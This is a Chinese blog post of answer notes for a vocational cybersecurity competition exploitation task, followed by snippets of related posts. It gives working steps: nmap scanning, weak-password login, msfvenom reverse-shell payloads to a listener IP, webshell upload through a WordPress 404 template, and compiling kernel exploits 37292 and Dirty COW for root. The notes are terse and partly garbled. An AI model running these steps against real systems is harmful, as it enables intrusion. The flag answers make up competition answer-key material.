中职网络安全B模块(系统漏洞提权)

已于 2023-05-15 09:48:48 修改
阅读量423 收藏 4
点赞数
文章标签: linux 网络 web安全 网络安全 安全
于 2023-05-15 09:01:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40731934/article/details/130676950
版权

B-1:系统漏洞利用与提权

任务环境说明:

  • 服务器场景:PYsystem001
  • 服务器场景操作系统:Ubuntu(显示链接)
  • 服务器用户名:未知 密码:未知
  1. 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交 nmap -sS -T4 -n ip
  2. 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;dirb 网址找到后台
  3.  admin 123456
  4. 利用Kali渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交
  6. payload
  7. 对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获

点击刷子然后点击最后一个进去点击404把木马上传

得的当前权限的用户名作为FLAG(形式:[用户名])提交;

https://192.168.137.233/wordpress/wp-content/twentythirteen/404.php访问回弹shell

 

  1. 查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;
  2. 在Kalei中查找可使用的漏洞源码,将找到的漏洞源码文件名作为FLAG(形式:[文件名])提交;37292.c
  4. 利用上述漏洞源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;
  7. 已经放在kali/root      wget http://ip/37292.c
  10. 进入cd /tmp  -P是大写
  11. 利用上述漏洞源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。
  13. gcc 37292.c -o 37292    chmod 777 37292  ./37292   拿到shell直接cat查看   

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.5 lport=4444 -f exe >shell.exe

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.43.5 lport=4444 -f elf >/root/shell.eif

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php

use  exploit /mlti/handler

scp -r /root/test.elf ubunt@ip

uname -an 查看内核版本信息

search tab  内核  可以查看到源码

gcc [漏洞文件] -o [编译后的文件名]

ls

chmod 777 源码

cd /root   cat 查看即可

藏牛提权
使用命令uname -a
看到linux的内核版本
只要版本低于3.10直接搜索40893
那个是ubuntu系统的
然后使用gcc -pthread 40893.c -o 1 -lcrypt

Liseth
关注
江西省省赛中职网络安全-系统漏洞利用与
weixin_48800344的博客
01-05 415
2021年职业院校技能大赛“网络安全”项目 江西省比赛任务书 一、竞赛时间 总计:420分钟 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 A模块 A-1 登录安全加固 180分钟 200分 A-2 Web安全加固(Web) A-3 流量完整性保护与事件监控(Web,Log) A-4 防火墙策略 A-5 Windows操作系统安全配置 A-6 Linux操作系统安全配置 B模块 B-1 系统漏洞利用与 400分 B-2 Linux操作系统渗透测试 B-3 应用服务漏洞扫描与利用 B-4 S
2022年全国中职网络安全国赛赛题思路(仅自己一个做题的思路)——网络安全竞赛试题(3)
panda.
04-03 6545
有word文档,要的私信我 仅仅供思路!!! 竞赛内容 模块A 基础设施设置与安全加固 (本模块20分) A-1任务一 登录安全加固(Windows, Linux) 请对服务器Windows、Linux按要求进行相应的设置,高服务器的安全性。 1.密码策略(Windows, Linux) a.最小密码长度不少于13个字符; b.密码必须符合复杂性要求。 2.用户安全管理(Windows) a.设置取得文件或其他对象的所有,将该限只指派给administrator
网络安全B模块(笔记详解)- Windows操作系统渗透测试
weixin_57536426的博客
12-24 1213
(字典路径/usr/share/wordlists/dirb/small.txt)5. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面限,将该场景系统中system文件使用reg相关命令取,将完整命令作为FLAG交;4. 通过本地PC中渗透测试平台win7对服务器场景Windows进行渗透测试,取得的账户密码有远程桌面限,将该场景系统中sam文件使用reg相关命令取,将完整命令作为FLAG交;
JavaScript学习笔记(二十)DOM动画效果
最新发布
2401_84254011的博客
04-28 978
/0 ~ 100}else{//100// 3. 速度取整;}else{}else{// 4. 终止条件;} , 50)
中职网络安全 B模块(信息隐藏探索)
大雾
05-15 370
Apt install steghide 1.通过本地PC中渗 透测试平台Kali对服务器场景Web20200529中的网站进行访问,找到登录界面中的FLAG,并将FLAG交 WELCOME TO CSS ! 记住failure.html2.通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,找到登录界面背景中的FLAG,并将FLAG交;Picturemerge 3.通过本地PC中渗透测试平台Kali
网络安全B模块(笔记详解)- Linux操作系统渗透
weixin_57536426的博客
01-26 810
1. 使用渗透机对服务器信息收集,并将服务器中SSH服务端口号作为flag交;2. 使用渗透机对服务器信息收集,并将服务器中主机名称作为flag交;3. 使用渗透机对服务器信息收集,并将服务器中系统内核版本作为flag交;4. 使用渗透机对服务器管理员,并将服务器中root目录下的文本内容作为flag交;5. 使用渗透机对服务器管理员,并将服务器中root的密码作为flag交;6. 使用渗透机对服务器管理员,并将服务器中root目录下的图片内容作为flag交。
网络安全B模块wireshark0051.pcap数据包分析
m0_73632458的博客
03-28 658
1. 从靶机服务器的FTP 上下载wireshark0051. pcap 数据包文件,找出黑客获取剑的可成功登录目标服务器FTP 的账号密码,并将黑客获取到的账号密码作为FIag 值<用户名与密码之问以英文逗号分隔,如:root, toor)交;6.继续分析数据包 wireshark0051.pcap,找出黑客暴力破解目标服务器 Telnet服务并成功获取到的用户名与密码,并将获取到的用户名与密码作为 Flag值(用户名与密码之问以英文逗号分隔,例如:root,toot)交;下载命令:get 文件名。
2022年中职网络空间安全C模块批量漏洞脚本和脚本制作思路
05-19
网络安全领域,尤其是在中职阶段的学习中,"2022年中职网络空间安全C模块批量漏洞脚本和脚本制作思路"是一个重要的课题。这个主题涉及到如何利用编程技术自动化检测和修复网络系统中的安全漏洞,网络安全...
2023年内蒙古自治区中职网络安全赛题-B模块
06-01
B模块主要涵盖安全事件响应、网络安全数据取证和应用安全三个主题,涉及的具体任务包括攻击日志分析、系统漏洞利用与、渗透测试以及隐写术的应用。以下是这些任务的详细解析: 1. **攻击日志分析**:参赛者需要...
中职网络安全技能竞赛C模块脚本
04-27
网络安全技能竞赛中,"中职网络安全技能竞赛C模块脚本"是一个重要的组成部分,它通常涉及到使用编程语言,如Python,来实现自动化解决方案。这个模块的设计目的是培养学生的实战能力和问题解决技巧,特别是在网络...
广东省2023技能大赛网络安全赛项 中职 B模块wp
04-20
广东省2023技能大赛网络安全赛项B模块的解题思路,不仅是选手们展示自身网络安全技能的平台,更是对选手们逻辑思维、实践能力和团队协作精神的全面考验。在这个模块中,选手们需要针对特定的网络安全问题,进行深入...
2022年中职组“网络安全”赛项广西竞赛任务书-B模块
05-04
问题交流QQ群:105167887
网络空间安全实战设备B8国赛B模块环境
05-26
网络空间安全实战设备B8国赛10个B模块环境
网络安全B模块(笔记详解)- 内存取证
weixin_57536426的博客
01-23 842
1.从内存文件中获取用户admin的密码并破解,将该密码作为flag值(密码长度为6个字符);2.获取内存文件中系统的IP地址,将IP地址作为flag值交;3.获取内存文件中系统的主机名,将主机名作为flag值交;4.内存文件的系统中存在挖矿进程,将矿池的IP地址作为flag值交;5.内存文件的系统中恶意进程在系统中注册了服务,请将服务名称作为flag值交。
中职网络安全B模块HTTP.SYS 漏洞利用及加固
FRANXX_02的博客
11-28 560
6.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,通过metasploit 调用 Http.sys 漏洞利用模块,配置相关参数针对靶机再次进行漏洞检测,将扫描结果第一行字符串作为 flag 交。4.通过本地 PC 中渗透测试平台 Kali 对服务器场景进行渗透测试,通过metasploit 调用 Http.sys 漏洞利用模块,配置相关参数针对靶机进行漏洞检测,将扫描结果第一行字符串作为 flag 交。通过漏洞利用靶机蓝屏重启了,然后需要取消启用内核缓存。
2022年中职组“网络安全”赛项浙江B模块
武恩赐
02-12 760
2022年中职组“网络安全”赛项浙江B模块
2022年全国职业院校技能大赛中职网络安全竞赛试题B模块 —wirehark数据分析与取证captureWH.pcapng(解析教程)
Jay
12-22 2243
results.pcap数据包任务环境说明:服务器场景:FTPServer20220509(关闭链接)FTP用户名:results密码:results1.从靶机服务器的FTP上下载results.pcap,分析该文件,将数据包内图片数量作为FLAG交。FLAG: 4212.对results.pcap数据包文件进行分析,将图片内隐藏的内容作为FLAG交。3.对results.pcap数据包文件进行分析,将额外信息文件的关键词作为FLAG交;
2022年全国职业技能大赛网络安全竞赛试题B模块自己解析思路(8)
路漫漫其修远兮
04-18 579
模块B 网络安全事件响应、数字取证调查和应用安全
2023年广东省网络安全B模块(笔记详解)
weixin_57536426的博客
12-29 1958
1.访问地址http://靶机IP/task1,分析页面内容,获取flag值,Flag格式为flag{xxx}; flag{Yes,you got the first flag} 2.访问地址http://靶机IP/task1,访问登录页面。用户user01的密码为1-1000以内的数,获取用户user01的密码,将密码作为Flag进行交,Flag格式为flag{xxx}; flag{Yeah!U have the password!} 3.访问地址http://靶机IP/task3,访问购物页面。分
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值